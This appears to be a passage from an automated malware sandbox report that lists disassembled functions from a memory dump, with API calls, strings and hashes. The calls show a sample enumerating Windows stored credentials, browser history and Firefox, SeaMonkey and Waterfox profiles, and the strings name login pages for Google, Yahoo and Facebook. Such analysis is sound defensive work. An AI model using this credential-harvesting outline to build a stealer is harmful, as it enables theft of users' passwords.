                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8dffcb2de6473715ddac6d72e3c76979a49d8854762dd44dbb162fd21f04a95
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                      • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                      • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                      • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                      • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                      • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                      • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                      • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                      • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                      • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                    • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                      • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                                                      • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                                                    • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                                                    • API String ID: 62308376-4196376884
                                                                                                                                                                                                                    • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                                    • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                                    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                    • _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040BEB2
                                                                                                                                                                                                                    • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3191383707-0
                                                                                                                                                                                                                    • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                                    • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403CBF
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403CD4
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403CE9
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403CFE
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403D13
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403DDA
                                                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                                    • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                                                                                    • API String ID: 3527940856-11920434
                                                                                                                                                                                                                    • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                                    • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00403E2D Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403E50
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403E65
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403E7A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403E8F
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403EA4
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403F6B
                                                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                                    • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                                                                                    • API String ID: 3527940856-2068335096
                                                                                                                                                                                                                    • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                                    • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00404020
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00404035
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                                    • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                                                    • API String ID: 3527940856-3369679110
                                                                                                                                                                                                                    • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                                    • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                                                    • API String ID: 3510742995-2641926074
                                                                                                                                                                                                                    • Opcode ID: ce3f0164aafa0249c1655987c9fd68d1cb4a7ac41c6f811fdb80cf943b1bed77
                                                                                                                                                                                                                    • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce3f0164aafa0249c1655987c9fd68d1cb4a7ac41c6f811fdb80cf943b1bed77
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                      • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                      • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004033D0
                                                                                                                                                                                                                    • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                                                                                                                                                                    • String ID: $0.@
                                                                                                                                                                                                                    • API String ID: 3030842498-1896041820
                                                                                                                                                                                                                    • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                                    • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2941347001-0
                                                                                                                                                                                                                    • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                                                                                    • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                                      • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                                                      • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memsetwcscat$Closewcscpywcslen
                                                                                                                                                                                                                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                                    • API String ID: 3249829328-1174173950
                                                                                                                                                                                                                    • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                                    • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                    • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                    • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 669240632-0
                                                                                                                                                                                                                    • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                                    • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                                    • String ID: "%s"
                                                                                                                                                                                                                    • API String ID: 1343145685-3297466227
                                                                                                                                                                                                                    • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                                    • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                                                                                                                    Download Yara Rule
